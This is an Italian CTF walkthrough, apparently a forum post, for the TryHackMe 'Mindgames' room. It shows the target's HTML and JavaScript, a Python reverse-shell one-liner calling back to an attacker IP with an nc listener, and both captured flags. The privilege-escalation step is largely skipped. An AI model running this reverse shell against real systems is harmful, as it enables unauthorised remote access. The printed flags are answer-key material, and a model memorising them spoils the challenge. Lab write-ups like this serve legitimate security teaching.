Descrizione:
Solo una pessima idea...
Nessun avviso. Attaccalo. Non mollare se rimani bloccato, enumera di più

Link: https://tryhackme.com/room/mindgames

  • Iniziamo enumerando i servizi con Nmap:

    user㉿parrot:/data/Mindgames$ curl -s http://10.10.211.54
    <!DOCTYPE html>
    <html>
    
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>Mindgames.</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" type="text/css" media="screen" href="/main.css">
        <script src="/main.js"></script>
    </head>
    
    <body onload="onLoad()">
        <h1>Sometimes, people have bad ideas.</h1>
        <h1>Sometimes those bad ideas get turned into a CTF box.</h1>
        <h1>I'm so sorry.</h1> <!-- That's a lie, I enjoyed making this. -->
        <p>Ever thought that programming was a little too easy? Well, I have just the product for you. Look at the example code below, then give it a go yourself!</p>
        <p>Like it? Purchase a license today for the low, low price of 0.009BTC/yr!</p>
        <h2>Hello, World</h2>
        <pre><code>+[------->++<]>++.++.---------.+++++.++++++.+[--->+<]>+.------.++[->++<]>.-[->+++++<]>++.+++++++..+++.[->+++++<]>+.------------.---[->+++<]>.-[--->+<]>---.+++.------.--------.-[--->+<]>+.+++++++.>++++++++++.</code></pre>
        <h2>Fibonacci</h2>
        <pre><code>--[----->+<]>--.+.+.[--->+<]>--.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.++[++>---<]>+.-[-->+++<]>--.>++++++++++.[->+++<]>++....-[--->++<]>-.---.[--->+<]>--.+[----->+<]>+.-[->+++++<]>-.--[->++<]>.+.+[-->+<]>+.[-->+++<]>+.+++++++++.>++++++++++.[->+++<]>++........---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.[-->+++<]>+.>++++++++++.[->+++<]>++....---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.++++.--------.++.-[--->+++++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.+++++.---------.>++++++++++...[--->+++++<]>.+++++++++.+++.[-->+++++<]>+++.-[--->++<]>-.[--->+<]>---.-[--->++<]>-.+++++.-[->+++++<]>-.---[----->++<]>.+++[->+++<]>++.+++++++++++++.-------.--.--[->+++<]>-.+++++++++.-.-------.-[-->+++<]>--.>++++++++++.[->+++<]>++....[-->+++++++<]>.++.---------.+++++.++++++.+[--->+<]>+.-----[->++<]>.[-->+<]>+++++.-----[->+++<]>.[----->++<]>-..>++++++++++.</code></pre>
        <h2>Try before you buy.</h2>
        <form id="codeForm">
            <textarea id="code" placeholder="Enter your code here..."></textarea><br>
            <button>Run it!</button>
        </form>
        <p></p>
        <label for="outputBox">Program Output:</label>
        <pre id="outputBox"></pre>
    </body>
    </html>
  • Intercettare le richieste con Burp Suite rivelerà che il form invia l'input del form alla posizione /api/bf, in modo asincrono, grazie a javascript (main.js):

    async function postData(url = "", data = "") {
        // Default options are marked with *
        const response = await fetch(url, {
            method: 'POST', // *GET, POST, PUT, DELETE, etc.
            cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
            credentials: 'same-origin', // include, *same-origin, omit
            headers: {
                'Content-Type': 'text/plain'
            },
            redirect: 'follow', // manual, *follow, error
            referrerPolicy: 'no-referrer', // no-referrer, *client
            body: data // body data type must match "Content-Type" header
        });
        return response; // We don't always want JSON back
    }
    function onLoad() {
        document.querySelector("#codeForm").addEventListener("submit", function (event) {
            event.preventDefault()
            runCode()
        });
    }
    async function runCode() {
        const programBox = document.querySelector("#code")
        const outBox = document.querySelector("#outputBox")
        outBox.textContent = await (await postData("/api/bf", programBox.value)).text()
  • Reverse shell

    import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);
    
    user㉿parrot:/data/Mindgames$ rlwrap nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [10.8.50.72] from (UNKNOWN) [10.10.211.54] 38032
    bash: cannot set terminal process group (677): Inappropriate ioctl for device
    bash: no job control in this shell
    mindgames@mindgames:~/webserver$ id
    id
    uid=1001(mindgames) gid=1001(mindgames) groups=1001(mindgames)
    mindgames@mindgames:~/webserver$ 
  • USER FLAG:

    mindgames@mindgames:~/webserver$ cd /home
    cd /home
    mindgames@mindgames:/home$ ls -l
    ls -l
    total 8
    drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 mindgames
    drwxr-x--- 5 tryhackme tryhackme 4096 May 11 15:25 tryhackme
    mindgames@mindgames:/home$ cd mindgames
    cd mindgames
    mindgames@mindgames:~$ ls -la
    ls -la
    total 40
    drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 .
    drwxr-xr-x 4 root      root      4096 May 11 13:48 ..
    lrwxrwxrwx 1 mindgames mindgames    9 May 11 15:25 .bash_history -> /dev/null
    -rw-r--r-- 1 mindgames mindgames  220 May 11 13:48 .bash_logout
    -rw-r--r-- 1 mindgames mindgames 3771 May 11 13:48 .bashrc
    drwx------ 2 mindgames mindgames 4096 May 11 14:07 .cache
    drwx------ 3 mindgames mindgames 4096 May 11 14:07 .gnupg
    drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:24 .local
    -rw-r--r-- 1 mindgames mindgames  807 May 11 13:48 .profile
    -rw-rw-r-- 1 mindgames mindgames   38 May 11 15:24 user.txt
    drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:36 webserver
    mindgames@mindgames:~$ cat user.txt
    cat user.txt
    thm{411f7d38247ff441ce4e134b459b6268}
  • ROOT FLAG:

    mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ cat server.service 
    [Unit]
    Description=Production Web Server
    
    [Service]
    User=mindgames
    Group=mindgames
    WorkingDirectory=/home/mindgames/webserver
    ExecStart=/home/mindgames/webserver/server -p 80
    Restart=always
    RestartSec=5
    
    [Install]
    WantedBy=multi-user.target
    mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ ls -la server.service 
    lrwxrwxrwx 1 root root 34 May 11 15:33 server.service -> /etc/systemd/system/server.service

Infine:

root@mindgames:~# cat /root/root.txt 
thm{1974a617cc84c5b51411c283544ee254}

RICAPITOLANDO:

User flag.
thm{411f7d38247ff441ce4e134b459b6268}

Root flag.
thm{1974a617cc84c5b51411c283544ee254}

    Powered by: FreeFlarum.
    (remove this footer)